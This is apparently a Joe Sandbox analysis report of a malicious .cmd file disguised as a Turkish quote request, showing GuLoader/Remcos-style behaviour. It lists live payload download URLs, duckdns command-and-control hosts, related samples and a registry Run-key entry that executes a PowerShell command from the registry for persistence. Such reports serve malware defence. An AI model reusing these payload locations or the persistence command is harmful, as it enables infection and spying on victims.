IPs or domains 38->69 51 C:\Users\user\AppData\Roaming\mvourhjs.dat, data 38->51 dropped 95 Installs a global keyboard hook 38->95 45 cmd.exe 1 38->45         started        file14 signatures15 process16 process17 47 conhost.exe 45->47         started        49 reg.exe 1 1 45->49         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Teklif talebi BAKVENTA-BAKUUsurpationens.cmd3%ReversingLabs
              Teklif talebi BAKVENTA-BAKUUsurpationens.cmd10%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              jgbours284hawara01.duckdns.org15%VirustotalBrowse
              geoplugin.net4%VirustotalBrowse
              duelvalenza.it4%VirustotalBrowse
              jgbours284hawara02.duckdns.org1%VirustotalBrowse
              www.duelvalenza.it5%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://contoso.com/0%URL Reputationsafe
              http://geoplugin.net/json.gpg0%Avira URL Cloudsafe
              jgbours284hawara01.duckdns.org100%Avira URL Cloudmalware
              http://87.121.105.163/Terminaljob.tocXRul0%Avira URL Cloudsafe
              http://www.duelvalenza.it/0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJ0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp00%Avira URL Cloudsafe
              http://geoplugin.net/k0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpl0%VirustotalBrowse
              http://www.duelvalenza.it/5%VirustotalBrowse
              http://geoplugin.net/json.gpg0%VirustotalBrowse
              http://geoplugin.net/json.gp40%Avira URL Cloudsafe
              http://87.121.105.1630%Avira URL Cloudsafe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.bin0%Avira URL Cloudsafe
              http://geoplugin.net/k0%VirustotalBrowse
              http://geoplugin.net/json.gp00%VirustotalBrowse
              http://crl.ver)0%Avira URL Cloudsafe
              jgbours284hawara01.duckdns.org15%VirustotalBrowse
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp70%Avira URL Cloudsafe
              http://www.duelvalenza.it/eU0%Avira URL Cloudsafe
              http://87.121.105.16322%VirustotalBrowse
              http://www.duelvalenza.it/nkF0%Avira URL Cloudsafe
              http://crl.microW0%Avira URL Cloudsafe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.bin4%VirustotalBrowse
              http://geoplugin.net/json.gp40%VirustotalBrowse
              https://duelvalenza.it/0%Avira URL Cloudsafe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/7%VirustotalBrowse
              http://87.121.105.163/wnnSAFMWPwDXGy95.bin0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp70%VirustotalBrowse
              http://geoplugin.net/json.gpH=0%Avira URL Cloudsafe
              http://87.121.105.163/Terminaljob.tocP0%Avira URL Cloudsafe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin30%Avira URL Cloudsafe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.bin0%Avira URL Cloudsafe
              https://duelvalenza.it/3%VirustotalBrowse
              http://87.121.105.163/Terminaljob.toc0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpH=4%VirustotalBrowse
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binM0%Avira URL Cloudsafe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp938=0%Avira URL Cloudsafe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binI0%Avira URL Cloudsafe
              http://87.121.H0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              jgbours284hawara01.duckdns.org
              		192.169.69.26
              		truetrueunknown
              google.com
              		142.251.41.78
              		truefalse
                		high
                geoplugin.net
                		178.237.33.50
                		truefalseunknown
                www.google.com
                		142.250.80.68
                		truefalse
                  		high
                  duelvalenza.it
                  		46.254.34.12
                  		truefalseunknown
                  jgbours284hawara02.duckdns.org
                  		45.88.90.110
                  		truetrueunknown
                  www.duelvalenza.it
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  jgbours284hawara01.duckdns.orgtrue
                  • 15%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://duelvalenza.it/wnnSAFMWPwDXGy95.binfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/false
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gptrue
                  • URL Reputation: phishing
                  		unknown
                  http://87.121.105.163/wnnSAFMWPwDXGy95.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://87.121.105.163/Terminaljob.tocfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://geoplugin.net/json.gpgwab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    • URL Reputation: malware
                    		unknown
                    http://87.121.105.163/Terminaljob.tocXRulpowershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gplwab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.duelvalenza.it/wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 5%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://go.micropowershell.exe, 00000002.00000002.2384493968.00000210AE111000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJwab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://geoplugin.net/json.gp0wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://geoplugin.net/kwab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://geoplugin.net/json.gp4wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://87.121.105.163powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2384493968.00000210AD0A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 22%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.ver)svchost.exe, 00000008.00000002.2883770137.000002087C800000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://g.live.com/odclientsettings/ProdV2.C:edb.log.8.drfalse
                        		high
                        http://geoplugin.net/json.gp7wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.duelvalenza.it/eUwab.exe, 0000000F.00000003.2220389190.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.duelvalenza.it/nkFwab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.microWpowershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://duelvalenza.it/wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/Prod.C:edb.log.8.drfalse
                            		high
                            https://g.live.com/odclientsettings/ProdV2edb.log.8.drfalse
                              		high
                              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drfalse
                                		high
                                https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://geoplugin.net/json.gpH=wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://87.121.105.163/Terminaljob.tocPpowershell.exe, 00000002.00000002.2384493968.00000210ACEBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin3wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.binwab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binMwab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://geoplugin.net/json.gp938=wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binIwab.exe, 0000000F.00000003.2208059166.0000000005A0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://87.121.Hpowershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          142.250.80.68
                                          		www.google.comUnited States
                                          		15169GOOGLEUSfalse
                                          45.88.90.110
                                          		jgbours284hawara02.duckdns.orgBulgaria
                                          		10753LVLT-10753UStrue
                                          46.254.34.12
                                          		duelvalenza.itItaly
                                          		52030SERVERPLAN-ASITfalse
                                          239.255.255.250
                                          		unknownReserved
                                          		unknownunknownfalse
                                          87.121.105.163
                                          		unknownBulgaria
                                          		43561NET1-ASBGfalse
                                          178.237.33.50
                                          		geoplugin.netNetherlands
                                          		8455ATOM86-ASATOM86NLfalse
                                          192.169.69.26
                                          		jgbours284hawara01.duckdns.orgUnited States
                                          		23033WOWUStrue

                                          Private

                                          IP
                                          192.168.2.4
                                          192.168.2.22
                                          127.0.0.1

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1435423
                                          Start date and time:2024-05-02 17:20:08 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 41s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:20
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winCMD@43/15@11/10
                                          EGA Information:
                                          • Successful, ratio: 33.3%
                                          HCA Information:
                                          • Successful, ratio: 68%
                                          • Number of executed functions: 27
                                          • Number of non-executed functions: 24
                                          Cookbook Comments:
                                          • Found application associated with file extension: .cmd

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.251.40.238, 172.253.115.84, 142.251.40.227, 34.104.35.123, 23.33.40.25, 192.229.211.108, 23.199.50.2, 23.51.58.94, 142.250.65.163, 142.251.40.206
                                          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                          • Execution Graph export aborted for target powershell.exe, PID 7504 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          16:21:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Stagenes %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)
                                          16:22:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Stagenes %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)
                                          17:20:55API Interceptor94x Sleep call for process: powershell.exe modified
                                          17:21:14API Interceptor2x Sleep call for process: svchost.exe modified
                                          17:21:53API Interceptor73x Sleep call for process: wab.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          239.255.255.250SAL_000268_DOM.xlsGet hashmaliciousUnknownBrowse
                                            http://cuts.kr/APFXMGet hashmaliciousUnknownBrowse
                                              5801.xlsGet hashmaliciousUnknownBrowse
                                                https://gamma.app/docs/Untitled-9umekc4egyknsobGet hashmaliciousHTMLPhisherBrowse
                                                  https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                      http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                        http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                          http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                              87.121.105.163PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 87.121.105.163/Sylvester.dwp
                                                              PO_La-Tannerie04180240418.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 87.121.105.163/tWVvmOpHE254.bin
                                                              LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 87.121.105.163/tossers.psp
                                                              rCW_00402902400429.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 87.121.105.163/Aviarists.aca
                                                              CDS AC 661171855-VN1 SOA.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 87.121.105.163/AKaUDBTG140.bin
                                                              DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                              • 87.121.105.163/PUzAKuQ35.bin
                                                              PO_La-Tanerie04180240124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                                                              FTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 87.121.105.163/EYioOXUtWs45.bin
                                                              Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 87.121.105.163/TjtonPwEiP175.bin
                                                              45.88.90.110PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                  DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                    BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                        rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                                          PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            46.254.34.12doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • www.duelvalenza.it/fnuRRYIa56.bin
                                                                            LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
                                                                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                            • www.duelvalenza.it/FIPWKWOaFXJGe178.bin

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            google.comSAL_000268_DOM.xlsGet hashmaliciousUnknownBrowse
                                                                            • 172.217.1.4
                                                                            01105751.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 142.251.40.206
                                                                            DHL0000879654982647865424.vbsGet hashmaliciousUnknownBrowse
                                                                            • 142.250.81.225
                                                                            http://cuts.kr/APFXMGet hashmaliciousUnknownBrowse
                                                                            • 142.251.40.228
                                                                            5801.xlsGet hashmaliciousUnknownBrowse
                                                                            • 172.217.1.4
                                                                            https://gamma.app/docs/Untitled-9umekc4egyknsobGet hashmaliciousHTMLPhisherBrowse
                                                                            • 142.250.80.100
                                                                            https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                            • 142.250.81.228
                                                                            9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 142.250.65.164
                                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                            • 142.250.80.68
                                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                            • 142.251.40.228
                                                                            jgbours284hawara01.duckdns.orgPLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 192.169.69.26
                                                                            LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 192.169.69.26
                                                                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            jgbours284hawara02.duckdns.orgPLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
                                                                            geoplugin.netGVV.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50
                                                                            202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50
                                                                            nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            SERVERPLAN-ASITdoc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 46.254.34.12
                                                                            LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 46.254.34.12
                                                                            https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
                                                                            • 46.254.38.218
                                                                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                            • 46.254.34.12
                                                                            https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
                                                                            • 46.254.38.218
                                                                            https://colmec.it/category/newsGet hashmaliciousUnknownBrowse
                                                                            • 46.254.38.218
                                                                            iOsHTdcOUN.elfGet hashmaliciousMiraiBrowse
                                                                            • 46.30.243.116
                                                                            huhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 46.30.243.112
                                                                            https://secosrl.com/.well-known/pki-validation/Auths/5155027697.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 185.81.4.196
                                                                            BRvptajioG.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                                            • 46.254.37.204
                                                                            NET1-ASBG01105751.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 87.121.105.54
                                                                            Aqua.x86-20240502-1008.elfGet hashmaliciousUnknownBrowse
                                                                            • 94.156.79.215
                                                                            Aqua.arm7-20240502-1008.elfGet hashmaliciousMiraiBrowse
                                                                            • 94.156.79.215
                                                                            yibSQnyAI7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 93.123.85.46
                                                                            ryOgrdefvB.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 93.123.85.46
                                                                            kdTZ0vraR2.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 93.123.85.46
                                                                            jj5TL5MXzK.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 93.123.85.46
                                                                            file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                            • 94.156.79.214
                                                                            PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 87.121.105.163
                                                                            831107010C8578AD95A12C5498B03755EAC398B5BBC0D.exeGet hashmaliciousRisePro StealerBrowse
                                                                            • 94.156.8.188
                                                                            LVLT-10753USPLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 45.88.90.110
